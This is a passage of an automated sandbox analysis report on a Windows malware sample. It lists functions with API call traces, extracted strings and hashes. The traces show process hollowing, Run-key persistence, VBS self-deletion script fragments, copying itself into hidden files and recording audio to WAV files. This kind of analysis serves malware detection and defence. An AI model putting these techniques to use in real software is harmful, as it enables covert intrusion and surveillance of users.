                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                          • String ID: DISPLAY
                                                          • API String ID: 1352755160-865373369
                                                          • Opcode ID: f43b31cd191835719c67feef2a51a2d06668b937d994ffc7dcc294679b32e0a8
                                                          • Instruction ID: a1654617e6feb41a21483335bab58d6c80918fdf06c9fa75f2eb3c48c5790805
                                                          • Opcode Fuzzy Hash: f43b31cd191835719c67feef2a51a2d06668b937d994ffc7dcc294679b32e0a8
                                                          • Instruction Fuzzy Hash: EFC16C31504344AFD7209F21CC44BABBBE9EF88751F44482EF989A32A1DF34E945CB5A
                                                          Function 0041742B Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417472
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00417475
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417486
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00417489
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041749A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041749D
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004174AE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004174B1
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00417552
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041756A
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00417580
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004175A6
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417626
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041763A
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00417671
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041773E
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0041775B
                                                          • ResumeThread.KERNEL32(?), ref: 00417768
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417780
                                                          • GetCurrentProcess.KERNEL32(?), ref: 0041778B
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004177A5
                                                          • GetLastError.KERNEL32 ref: 004177AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                          • API String ID: 4188446516-3035715614
                                                          • Opcode ID: ca58d074774f4cb3cec8caed2bdcc8ae3fb1cd477b48ba63cf2103ffe40dc484
                                                          • Instruction ID: 9d7e092ec3b05a7a521957261ed1896ff906ab06cfb84d00d3f911d9ff722cfe
                                                          • Opcode Fuzzy Hash: ca58d074774f4cb3cec8caed2bdcc8ae3fb1cd477b48ba63cf2103ffe40dc484
                                                          • Instruction Fuzzy Hash: C3A16D71508304AFD710DF65CD89B6B7BF8FB48345F00082EF699962A1DB75E884CB6A
                                                          Function 0040C28E Relevance: 47.5, APIs: 6, Strings: 21, Instructions: 282registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                            • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                            • Part of subcall function 0041B79A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C632
                                                          • ExitProcess.KERNEL32 ref: 0040C63E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: SG$ SG$ SG$""", 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$PSG$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-1415323999
                                                          • Opcode ID: 8e9550d2a36138100e1c2fc1d5f82ae9fdcfc18a7661daa6d71ec6f3d761d588
                                                          • Instruction ID: 61d23169d088639e971774d7266815e56d2523c1fe05d3951d40341dc357c42d
                                                          • Opcode Fuzzy Hash: 8e9550d2a36138100e1c2fc1d5f82ae9fdcfc18a7661daa6d71ec6f3d761d588
                                                          • Instruction Fuzzy Hash: F891A3316042005AC314FB21D852AAF7799AF90318F50453FF88AB71E2EF7CAD49C69E
                                                          Function 0040BF04 Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 260registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                            • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C013
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C056
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475308,?,pth_unenc), ref: 0040C065
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                            • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C280
                                                          • ExitProcess.KERNEL32 ref: 0040C287
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: SG$ SG$")$.vbs$On Error Resume Next$PSG$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-899740633
                                                          • Opcode ID: 45352128316decb50fa812bea07fa27229c4ed24509ec15bd5d086fbabda10ef
                                                          • Instruction ID: 3970d62be7f9f5e1fdb580af11360c5c0218cddba346a3e39168d22276c4a34b
                                                          • Opcode Fuzzy Hash: 45352128316decb50fa812bea07fa27229c4ed24509ec15bd5d086fbabda10ef
                                                          • Instruction Fuzzy Hash: 838194316042005BC315FB21D852AAF7799AF91708F10453FF986A72E2EF7C9D49C69E
                                                          Function 0041138D Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00475308,?,00000000), ref: 004113AC
                                                          • ExitProcess.KERNEL32 ref: 004115F5
                                                            • Part of subcall function 00412735: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                            • Part of subcall function 00412735: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                            • Part of subcall function 00412735: RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 00411433
                                                          • OpenProcess.KERNEL32(00100000,00000000,,@,?,?,?,?,00000000), ref: 00411442
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0041144D
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411454
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 0041145A
                                                            • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                            • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                            • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041148B
                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 004114E7
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411501
                                                          • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 00411513
                                                            • Part of subcall function 0041B79A: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B7F6
                                                            • Part of subcall function 0041B79A: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B80A
                                                            • Part of subcall function 0041B79A: CloseHandle.KERNEL32(00000000), ref: 0041B817
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041155B
                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0041159C
                                                          • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004115B1
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004115BC
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004115C3
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004115C9
                                                            • Part of subcall function 0041B79A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                          • String ID: ,@$.exe$0TG$PSG$WDH$exepath$open$temp_
                                                          • API String ID: 4250697656-4136069298
                                                          • Opcode ID: db40e97701d6933eb01dc6137a2f1fe71b6556f31fe51939fd8c3e0f7f5558e8
                                                          • Instruction ID: 17001e37a1d7cf9a3413e78a7a022695eb621cd558d1591dce66fb7483b9d66c
                                                          • Opcode Fuzzy Hash: db40e97701d6933eb01dc6137a2f1fe71b6556f31fe51939fd8c3e0f7f5558e8
                                                          • Instruction Fuzzy Hash: 7551B571A00315BBDB00A7A09C46EFE736E9B44715F10416BF906B71E2EF788E858A9D
                                                          Function 0041A3B1 Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 180synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A4A8
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A4BC
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00466554), ref: 0041A4E4
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041A4F5
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A536
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A54E
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A563
                                                          • SetEvent.KERNEL32 ref: 0041A580
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A591
                                                          • CloseHandle.KERNEL32 ref: 0041A5A1
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A5C3
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A5CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $TeF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                          • API String ID: 738084811-3504112074
                                                          • Opcode ID: 487eb8d61853791132be4fc542b0a4356c39d735bd1ee74e7e5f7e21231ae993
                                                          • Instruction ID: 23b594f260307180257043fa1e2d6aa1707bafa700398656917524c484c431be
                                                          • Opcode Fuzzy Hash: 487eb8d61853791132be4fc542b0a4356c39d735bd1ee74e7e5f7e21231ae993
                                                          • Instruction Fuzzy Hash: A251B1716442046AD214BB32EC92EBF3B9DAB90758F10443FF445621E2EE789D48866F
                                                          Function 0040BC67 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 203fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0040BC75
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750FC,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,004750FC,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                          • _wcslen.LIBCMT ref: 0040BD54
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                          • _wcslen.LIBCMT ref: 0040BE34
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750FC,0000000E), ref: 0040BE9B
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000001), ref: 0040BEB9
                                                          • ExitProcess.KERNEL32 ref: 0040BED0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                          • String ID: SG$ SG$ SG$ SG$ SG$6$C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$del$open
                                                          • API String ID: 1579085052-2918249962
                                                          • Opcode ID: 0585f1678bb5d4e8e7e6530c04c4a9b567f933f53f733ffc91d09e89a9b2ad51
                                                          • Instruction ID: cada26950b0f91ffbe9684419e497f708478a0192fdd3dd39558b78de3226dfb
                                                          • Opcode Fuzzy Hash: 0585f1678bb5d4e8e7e6530c04c4a9b567f933f53f733ffc91d09e89a9b2ad51
                                                          • Instruction Fuzzy Hash: 0B51C1316046006BD609B722EC52E7F77889F81719F50443FF985A62E2DF7CAD4582EE
                                                          Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                          • WriteFile.KERNEL32(00000000,00472B02,00000002,00000000,00000000), ref: 00401CE0
                                                          • WriteFile.KERNEL32(00000000,00472B04,00000004,00000000,00000000), ref: 00401CF0
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                          • WriteFile.KERNEL32(00000000,00472B0E,00000002,00000000,00000000), ref: 00401D22
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          • Opcode ID: d86e0a11b62900f44300c56c570c8f4c6d29e182ebfed168058ac3948617b838
                                                          • Instruction ID: 459023fa40bd80d73c97eac26e4027242e7445eca248bff5dcea5bec94493f3f
                                                          • Opcode Fuzzy Hash: d86e0a11b62900f44300c56c570c8f4c6d29e182ebfed168058ac3948617b838
                                                          • Instruction Fuzzy Hash: 85411C726443187AE210DE51DD86FBB7FACEB85B54F40081AF644E6080D7A5E909DBB3
                                                          Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000003,004068DA,004752F0,00406933), ref: 004064F4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-2606053238
                                                          • Opcode ID: ef23c6471a2b46cbb5b12a679159521cca5d22753a6c35f36816646c352fbe50
                                                          • Instruction ID: d8392adca69ca7380431791802c09c3f057f20abbaf47be00649cb9a46baa942
                                                          • Opcode Fuzzy Hash: ef23c6471a2b46cbb5b12a679159521cca5d22753a6c35f36816646c352fbe50
                                                          • Instruction Fuzzy Hash: D20171A4E40B1635CB206F7B7C94D17AEAC9E503503160837A406F32A1EEBCD400CD7D
                                                          Function 0041B3C6 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0041B3E1
                                                          • _memcmp.LIBVCRUNTIME ref: 0041B3F9
                                                          • lstrlenW.KERNEL32(?), ref: 0041B412
